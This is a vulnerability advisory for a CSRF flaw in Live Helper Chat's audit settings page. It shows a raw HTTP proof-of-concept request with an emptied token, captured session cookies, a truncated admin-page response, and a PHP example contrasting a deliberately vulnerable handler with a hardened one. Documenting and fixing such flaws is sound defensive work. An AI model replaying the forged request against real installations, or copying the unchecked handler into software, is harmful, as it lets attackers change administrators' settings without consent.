CVE-2022-0226: Cross-Site Request Forgery (CSRF) in livehelperchat

livehelperchat is vulnerable to Cross-Site Request Forgery (CSRF)

Description

A CSRF issue exists in the audit configuration page under settings. The server performs no CSRF token validation: if the CSRF token value is removed and the token field is submitted empty, the action is still performed.

Proof of Concept

Request

POST /site_admin/audit/configuration HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/audit/configuration
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=nq51ir4qicpnju1bdmqjitcuaj
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&days_log=90&log_js=on&StoreOptions=Save

In the above request, you can see that I have removed the CSRF token, and the server still accepts the request and performs the desired action.
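
The server-side check whose absence the request above demonstrates, written as an added example; it is not code from the original report or from Live Helper Chat. The function names, the `csrf_token` session key and the starting configuration are assumptions, while the `csfr_token` field name and the first request body are taken from the request shown above.

```php
<?php
declare(strict_types=1);

// Added example, not Live Helper Chat code. Function names and the
// 'csrf_token' session key are hypothetical; the 'csfr_token' field name
// and the first request body come from the request shown above.

/** Accept only a non-empty string token equal to the session's token. */
function validCsrfToken(array $session, array $post): bool
{
    $expected  = $session['csrf_token'] ?? '';
    $submitted = $post['csfr_token'] ?? '';
    // Reject a missing field, an empty value, and array input such as
    // csfr_token[]=x before comparing.
    if (!is_string($expected) || $expected === ''
        || !is_string($submitted) || $submitted === '') {
        return false;
    }
    return hash_equals($expected, $submitted); // constant-time comparison
}

/** Stores the submitted audit settings into $config. */
function storeAuditOptions(array $post, array &$config): void
{
    $config['days_log'] = (int) ($post['days_log'] ?? 0);
    $config['log_js']   = isset($post['log_js']);
}

/** Behaviour described in the report: the token is never checked. */
function handleVulnerable(array $session, array $post, array &$config): int
{
    if (isset($post['StoreOptions'])) {
        storeAuditOptions($post, $config);
    }
    return 200;
}

/** Same handler with the token validated before any state change. */
function handleHardened(array $session, array $post, array &$config): int
{
    if (!isset($post['StoreOptions'])) {
        return 200; // plain page view, nothing to protect
    }
    if (!validCsrfToken($session, $post)) {
        return 403; // refuse and leave $config untouched
    }
    storeAuditOptions($post, $config);
    return 200;
}

// Constructed session and starting configuration.
$session = ['csrf_token' => bin2hex(random_bytes(16))];
$initial = ['days_log' => 30, 'log_js' => false];

// Constructed request bodies; the first is the body from the report.
$bodies = [
    'empty token (report)' => 'csfr_token=&days_log=90&log_js=on&StoreOptions=Save',
    'token field absent'   => 'days_log=90&log_js=on&StoreOptions=Save',
    'token sent as array'  => 'csfr_token[]=x&days_log=90&log_js=on&StoreOptions=Save',
    'valid session token'  => 'csfr_token=' . $session['csrf_token']
                              . '&days_log=90&log_js=on&StoreOptions=Save',
];

foreach ($bodies as $label => $body) {
    parse_str($body, $post);
    foreach (['handleVulnerable', 'handleHardened'] as $handler) {
        $config = $initial;
        $status = $handler($session, $post, $config);
        printf("%-22s %-16s HTTP %d  config %s\n", $label, $handler, $status,
            $config === $initial ? 'unchanged' : 'changed');
    }
}
```

The vulnerable handler changes the configuration for all four bodies; the hardened handler returns 403 and leaves it unchanged for every body except the one carrying the session's own token.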

Successful Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 Jan 2022 10:30:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Cache-Control: nocache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 02 Jan 1990 00:00:00 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 47652

<!DOCTYPE html><html  lang="en" dir="" ng-app="lhcApp"><head><title ng-non-bindable>Options &laquo; System configuration &laquo; Live Helper Chat - live support</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"><link rel="icon" type="image/png" href="/design/defaulttheme/images/favicon.ico" /><link rel="shortcut icon" type="image/x-icon" href="/design/defaulttheme/images/favicon.ico"><meta name="Keywords" content="" /><meta name="Description" content="" /><meta name="robots" content="noindex, nofollow"><meta name="copyright" content="Remigijus Kiminas, livehelperchat.com"><link rel="stylesheet" type="text/css" href="/design/defaulttheme/css/css_static/a6692c332b973bd8c9a6ef0bd106e855.css?1641801574" /><script type="text/javascript">var WWW_DIR_JAVASCRIPT = '/site_admin/';var WWW_DIR_JAVASCRIPT_FILES = '/design/defaulttheme/sound';var WWW_DIR_LHC_WEBPACK = '/design/defaulttheme/js/lh/dist/';var WWW_DIR_LHC_WEBPACK_ADMIN = '/design/defaulttheme/js/admin/dist/';var WWW_DIR_JAVASCRIPT_FILES_NOTIFICATION = '/design/defaulttheme/images/notification';var confLH = {};confLH.back_office_sinterval = 10000;confLH.chat_message_sinterval = 3500;confLH.transLation = {"sending":"Sending...","delete_confirm":"Are you sure you want to delete this chat?","new_chat":"New chat request","transfered":"New chat has been transferred to you directly!","edit":"Edit","quote":"Quote","copy":"Copy","copy_group":"Copy all","ask_help":"Ask for help","translate":"Translate","new":"New"};confLH.new_message_sound_user_enabled = 1;confLH.csrf_token = 'ddd6453b3a4966fd49c28edd5975617b';confLH.user_id = '1';confLH.show_alert_transfer = 1;confLH.show_alert = 0;confLH.auto_join_private = 1;confLH.new_message_sound_admin_enabled = 1;confLH.new_message_browser_notification = 0;confLH.new_chat_sound_enabled = 1;confLH.sn_off = 1;confLH.ownntfonly = 
0;confLH.accept_chats = 0;confLH.auto_uppercase = 1;confLH.new_dashboard = false;confLH.hide_tabs = 1;confLH.no_scroll_bottom = 0;confLH.scroll_load = 1;confLH.repeat_sound = 1;confLH.repeat_sound_delay = 5;confLH.content_language = 'en';confLH.defaultm_hegiht = '200';confLH.dlist = {'op_n':'10'};confLH.lngUser = 'en';confLH.gmaps_api_key = "";</script><script src="/design/defaulttheme/js/js_static/2961a882a73f1d6f1a235887b4ea364a.js?1641801574"></script></head><body id="admin-body" class="pr-0 " ng-cloak ng-controller="LiveHelperChatCtrl as lhc" ng-init="lhc.getToggleWidget('pending_chats_sort','false');"><nav class="navbar navbar-expand-lg border-bottom p-0 pl-1 top-menu-bar-lhc" translate="no"><a rel="noreferrer" class="navbar-brand back-logo" href="/site_admin/" title="Live Helper Chat"><img class="img-fluid" src="/design/defaulttheme/images/general/logo.png" alt="Live Helper Chat" title="Live Helper Chat"></a><button class="btn border-0 mr-auto btn-outline-secondary" type="button" ng-click="lhc.toggleList('lmtoggle')" title="Expand or collapse left menu" aria-expanded="true" aria-label="Toggle navigation"><span class="material-icons mr-0">menu</span></button><div ng-cloak class="version-updated float-left" ng-if="lhc.lhcPendingRefresh == true || lhc.lhcConnectivityProblem == true || lhc.inActive == true"><div ng-if="lhc.lhcPendingRefresh == true"><i class="material-icons">update</i>This window will be automatically refreshed in {{lhc.lhcVersionCounter}} seconds due to a version update.</div><div ng-if="lhc.lhcConnectivityProblem == true">You have weak internet connection or the server has problems. Try to refresh the  page. Error code {{lhc.lhcConnectivityProblemExplain}}</div><div ng-if="lhc.inActive == true">You went offline because of inactivity. 
Please close other chat windows if you have any</div></div><button class="navbar-toggler btn border-0 btn-outline-secondary pb-2" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation"><span class="material-icons mr-0">menu</span></button><div class="collapse navbar-collapse" id="navbarNavDropdown"><ul class="navbar-nav ml-auto"><li class="list-inline-item nav-item"><a href="#" class="nav-link"><i id="online-offline-user" class="material-icons ng-cloak" ng-click="lhc.changeOnline()" title="Change my status to online/offline" >{{lhc.hideOnline == true ? 'flash_off' : 'flash_on'}}</i></a></li><li class="nav-item dropleft"><a href="#" class="nav-link dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false">Remigijus </a><div class="dropdown-menu" style="min-width: 25rem;" role="menu"><div class="row"><div class="col-6"><div class="pl-2 pt-1 font-weight-bold" ng-non-bindable>Hello&nbsp;Remigijus!</div></div><div class="col-6"><a class="dropdown-item pl-2" href="/site_admin/user/account" title="Account"><i class="material-icons">account_box</i>Account</a></div><div class="col-6"><a title="Toggle between dark and white themes" href="/site_admin/front/switchdashboard/(action)/mode" class="csfr-required dropdown-item pl-2"><span class="material-icons">settings_brightness</span>Dark/bright</a></div><div class="col-6"><a class="dropdown-item pl-2 csfr-required" href="/site_admin/user/logout" title="Logout"><i class="material-icons">exit_to_app</i>Logout</a></div></div><hr class="m-0"><div class="row"><div class="col-12"><a href="/site_admin/user/setsetting/auto_uppercase/0" class="csfr-required dropdown-item pl-2"><span class="material-icons">check</span>Auto uppercase sentences</a></div><div class="col-12"><a href="/site_admin/user/setsetting/no_scroll_bottom/1" class="csfr-required dropdown-item pl-2"><span class="material-icons">remove_done</span>Do not 
scroll to the bottom on chat open</a></div><div class="col-12"><a href="/site_admin/user/setsetting/auto_preload/1" class="csfr-required dropdown-item pl-2"><span class="material-icons">remove_done</span>Auto preload previous visitor chat messages</a></div><div class="col-12"><a href="/site_admin/user/setsetting/scroll_load/0" class="csfr-required dropdown-item pl-2"><span class="material-icons">check</span>Load previous message on scroll</a></div><div class="col-6"><a href="#" class="dropdown-item pl-2" onclick="lhinst.disableChatSoundAdmin($(this));event.stopPropagation()" title="Enable/Disable sound about new messages from users"><i class="material-icons" >volume_up</i>New messages</a></div><div class="col-6"><a href="#" class="dropdown-item pl-2" onclick="lhinst.disableNewChatSoundAdmin($(this));event.stopPropagation()" title="Enable/Disable sound about new pending chats"><i class="material-icons" >volume_up</i>New chats</a></div></div><hr class="m-0"><div class="row"><div class="col-6"><a href="#" class="dropdown-item pl-2" ng-click="lhc.changeOnline($event)" title="Change my status to online/offline"><i id="online-offline-user" class="material-icons ng-cloak" >{{lhc.hideOnline == true ? 'flash_off' : 'flash_on'}}</i>{{lhc.hideOnline == true ? "Offline" : "Online"}}</a></div><div class="col-6"><a href="#" class="dropdown-item pl-2" title="Change my persistent status to online" ng-click="lhc.changeAlwaysOnline($event)"><i class="material-icons ng-cloak"  >{{lhc.hideOnline == true ? 'flash_off' : (lhc.alwaysOnline == true ? 'toggle_on' : 'toggle_off')}}</i>{{lhc.alwaysOnline == true ? "Always online" : "Based on activity"}}</a></div><div class="col-12"><a href="#" class="dropdown-item pl-2" ng-click="lhc.changeVisibility($event)"><i id="vi-in-user" class="material-icons ng-cloak" title="Change my visibility to visible/invisible" >{{lhc.hideInvisible == true ? 'visibility_off' : 'visibility'}}</i>{{lhc.hideInvisible == true ? 
"Invisible" : "Visible"}}</a></div></div><hr class="m-0"></div></li><li class="li-icon nav-item"><a class="nav-link" ng-click="lhc.toggleList('lmtoggler')" title="Expand or collapse right menu"><span class="material-icons">menu</span></a></li></ul></div></nav><div id="wrapper" ng-cloak ng-class="{toggled: lmtoggle, toggledr : lmtoggler}"><div id="sidebar-wrapper" ng-cloak translate="no"><div class="navbar-light sidebar" role="navigation"><div class="sidebar-nav navbar-collapse"><ul class="nav" id="side-menu"><li class="nav-item"><a class="nav-link" href="/site_admin/" onclick="$('#tabs a[href=\'#dashboard\']').tab('show')"><i class="material-icons md-18">home</i>Dashboard</a></li><li class="nav-item"><a href="#" class="nav-link"><i class="material-icons">chat</i>Chat<i class="material-icons arrow">chevron_right</i></a><ul class="nav nav-second-level"><li class="nav-item"><a class="nav-link" href="#" onclick="javascript:lhinst.chatTabsOpen()"><i class="material-icons">chat</i>Chat tabs</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/chat/list" ><i class="material-icons">list</i>Chats list</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/views/home" ><i class="material-icons">saved_search</i>My views</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/chat/onlineusers" ><i class="material-icons">face</i>Online visitors</a></li></ul></li><li class="nav-item"><a class="nav-link" href="/site_admin/system/configuration"><i class="material-icons">settings_applications</i>Settings</a></li><li class="nav-item"><a href="#" class="nav-link"><i class="material-icons">info_outline</i>Modules<i class="material-icons arrow md-18">chevron_right</i></a><ul class="nav nav-second-level"><li class="nav-item"><a class="nav-link" href="/site_admin/questionary/list"><i class="material-icons">email</i>Questionary</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/faq/list"><i class="material-icons">help</i>FAQ</a></li><li 
class="nav-item"><a class="nav-link" href="/site_admin/chatbox/configuration"><i class="material-icons">comment</i>Chatbox</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/browseoffer/index"><i class="material-icons">open_in_browser</i>Browse offers</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/form/index"><i class="material-icons">attachment</i>Forms</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/fbmessenger/index"><i class="material-icons">comment</i>Facebook chat</a></li></ul></li></ul></div></div></div><div id="page-content-wrapper"><div id="path-container" ng-non-bindable><ul class="breadcrumb rounded-0 border-bottom p-2 mb-0" itemscope itemtype="http://data-vocabulary.org/Breadcrumb">
<li class="breadcrumb-item"><a rel="home" itemprop="url" href="/site_admin/"><span itemprop="title">Home</span></a></li><li class="breadcrumb-item" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="/site_admin/system/configuration" itemprop="url"><span itemprop="title">System configuration</span></a></li><li class="breadcrumb-item" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><span itemprop="title">Options</span></li></ul></div><div class="row"><div id="middle-column-page" class="col-xl-9 pb-1"><h1 class="attr-header">Audit Configuration</h1><form action="" method="post" ng-non-bindable><input type="hidden" name="csfr_token" value="ddd6453b3a4966fd49c28edd5975617b" /><div role="alert" class="alert alert-success alert-dismissible fade show"><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>Settings updated</div><div class="form-group"><label>How many days keep log?</label><input type="text" class="form-control" name="days_log" value="90" /></div><div class="form-group"><label><input type="checkbox" name="log_js" checked value="on" /> Log javascript errors</label></div><div class="form-group"><label><input type="checkbox" name="log_block"  value="on" /> Log applied blocks</label></div><div class="form-group"><label><input type="checkbox" name="log_user"  value="on" /> Log users changes</label></div><h5>What objects changes log?</h5><div class="row"><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="AutoResponder">Auto Responder</label></div><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="CannedMsg">Canned Message</label></div><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="Subject">Subject</label></div><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="Departament">Department</label></div></div><input type="submit" class="btn btn-secondary" 
name="StoreOptions" value="Save" /></form></div><div class="columns col-xl-3 right-column-page-general" translate="no" id="right-column-page" ng-cloak><div role="tabpanel" ng-show="transfer_dep_chats.list.length > 0 || transfer_chats.list.length > 0"><!-- Nav tabs -->
<ul class="nav nav-pills" role="tablist"><li role="presentation" class="active"><a title="Chats transferred to you directly" href="#transferedperson" aria-controls="transferedperson" role="tab" data-toggle="tab"><i class="material-icons">account_box</i><span class="tru-cnt"></span></a></li><li role="presentation"><a title="Transferred to your department" href="#transfereddep" aria-controls="transfereddep" role="tab" data-toggle="tab"><i class="material-icons">account_box</i><span class="trd-cnt"></span></a></li></ul><!-- Tab panes -->
<div class="tab-content"><div role="tabpanel" class="tab-pane active" id="transferedperson"><div id="right-transfer-chats"><ul class="no-bullet fs12"><li ng-repeat="chat in transfer_chats.list"><img class="action-image right-action-hide" align="absmiddle" ng-click="lhc.startChatTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/accept.png" alt="Accept chat" title="Accept chat"><img class="action-image" align="absmiddle" ng-click="lhc.startChatNewWindowTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/application_add.png" alt="Open in a new window" title="Open in a new window"> {{chat.id}}. {{chat.nick}} ({{chat.time_front}})</li></ul><p ng-show="transfer_chats.list.length == 0">Empty...</p></div></div><div role="tabpanel" class="tab-pane" id="transfereddep"><div id="right-transfer-departments"><ul class="no-bullet small-list"><li ng-repeat="chat in transfer_dep_chats.list"><img class="action-image right-action-hide" align="absmiddle" ng-click="lhc.startChatTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/accept.png" alt="Accept chat" title="Accept chat"><img class="action-image" align="absmiddle" ng-click="lhc.startChatNewWindowTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/application_add.png" alt="Open in a new window" title="Open in a new window"> {{chat.id}}. {{chat.nick}} ({{chat.time_front}})</li></ul><p ng-show="transfer_dep_chats.list.length == 0">Empty...</p></div></div></div></div><div class="card panel-lhc""><div class="card-header"><a class="title-card-header" href="/site_admin/chat/list/(user_id)/1"><i class="material-icons chat-active">account_box</i>My active and pending chats ({{my_chats.list.length}}{{my_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('my_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{my_chats_expanded == true ? 
'expand_less' : 'expand_more'}}</a></div><div id="right-my-chats" ng-show="my_chats_expanded == true"><div class="p-2"><div class="row"><div class="col-10 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.mcd.length == 0 ? "All departments" : (lhc.mcd.length == 1 && true ? lhc.mcdNames.join(", ") : '['+lhc.mcd.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('mcd',true)" type="checkbox" ng-model="lhc.mcd_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.mcd_products" checklist-change="lhc.productChanged('mcd_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.mcd_dpgroups" checklist-change="lhc.productChanged('mcd_dpgroups')" checklist-value="department.id"><i title="Department group" 
class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.mcd_only_explicit_online == true && department.oexp == false) || (lhc.mcd_hide_hidden == true && department.hidden == true) || (lhc.mcd_hide_disabled == true && department.disabled == true) || (lhc.mcd_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.mcd" checklist-change="lhc.departmentChanged('mcd')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limitmc" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div ng-if="my_chats && my_chats.list.length > 0" class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="25%"><i title="Last message" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in my_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" 
title="{{chat.country_name}}" />&nbsp;</span><a ng-click="lhc.previewChat(chat.id,$event);" class="material-icons">info_outline</a><i title="Has unread messages" ng-if="chat.hum" class="material-icons text-danger">feedback</i><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.status == 1 ? 'Active' : 'Pending'}}"><i ng-if="chat.status != 1" title="Pending chat" class="material-icons chat-unread">&#xE80E;</i><span class="material-icons text-success" title="Receive or send indicator and time since it happened" ng-class="{'text-danger' : chat.pnd_rsp}"}>{{chat.pnd_rsp === true ? 'call_received' : 'call_made'}}</span>{{chat.status == 0 ? '&#x23F3; '+chat.wait_time_pending : chat.last_msg_time_front}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table></div><div ng-if="!my_chats || my_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div><div class="card-header"><a class="title-card-header" href="/site_admin/chat/list/(chat_status_ids)/0"><i class="material-icons chat-pending">chat</i>Pending chats ({{pending_chats.list.length}}{{pending_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('pending_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{pending_chats_expanded == true ? 
'expand_less' : 'expand_more'}}</a></div><div id="right-pending-chats" ng-if="pending_chats_expanded == true"><div class="p-2"><div class="row"><div class="col-6 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.pendingd.length == 0 ? "All departments" : (lhc.pendingd.length == 1 && true ? lhc.pendingdNames.join(", ") : '['+lhc.pendingd.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('pendingd',true)" type="checkbox" ng-model="lhc.pendingd_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingd_products" checklist-change="lhc.productChanged('pendingd_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingd_dpgroups" checklist-change="lhc.productChanged('pendingd_dpgroups')" 
checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.pendingd_only_explicit_online == true && department.oexp == false) || (lhc.pendingd_hide_hidden == true && department.hidden == true) || (lhc.pendingd_hide_disabled == true && department.disabled == true) || (lhc.pendingd_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.pendingd" checklist-change="lhc.departmentChanged('pendingd')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-4 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">Users</button><ul class="dropdown-menu dropdown-lhc" role="menu"><li class="p-1"><input type="text" data-stopPropagation="true" ng-model="lhc.userFilterText" placeholder="Search for operator" class="form-control form-control-sm" value=""></li><li ng-repeat="userItem in lhc.userList" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingu" checklist-change="lhc.productChanged('pendingu')" checklist-value="userItem.id"><i title="User" class="material-icons">account_box</i>{{userItem.name || userItem.name_official}}</label></li><li ng-show="lhc.userGroups.length > 0" class="border-top"></li><li ng-repeat="userGroup in lhc.userGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingd_ugroups" checklist-change="lhc.productChanged('pendingd_ugroups')" checklist-value="userGroup.id"><i title="User group" 
class="material-icons">people</i>{{userGroup.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limitp" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table" ng-if="pending_chats.list.length > 0"><thead><tr><th width="40%"><i title="Visitor" class="material-icons">face</i><a ng-click="lhc.toggleWidget('pending_chats_sort',true)"><i title="Sort" class="material-icons">{{lhc.toggleWidgetData['pending_chats_sort'] == false ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="20%"><i title="Wait time" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in pending_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list" ><a title="Delete chat" class="material-icons float-right" ng-click="lhc.deleteChat(chat.id);$event.stopPropagation()">delete</a><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a ng-show="chat.can_edit_chat" class="material-icons" title="Redirect user to contact form." 
ng-click="lhc.redirectContact(chat.id,'Are you sure?',$event)">reply</a><a ng-click="lhc.previewChat(chat.id,$event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}<small>{{chat.plain_user_name !== undefined ? ' | ' + chat.plain_user_name : ''}}</small></div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.wait_time_pending}}">{{chat.wait_time_pending}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}"><a class="text-primary" ng-click="lhc.openModal('statistic/departmentstats/'+chat.dep_id,$event)"><i class="material-icons">donut_large</i>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</a></div></td></tr></table><div ng-if="pending_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div></div><div class="card-header"><a class="title-card-header" href="/site_admin/chat/list/(chat_status_ids)/1"><i class="material-icons chat-active">chat</i>Active chats ({{active_chats.list.length}}{{active_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('active_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{active_chats_expanded == true ? 
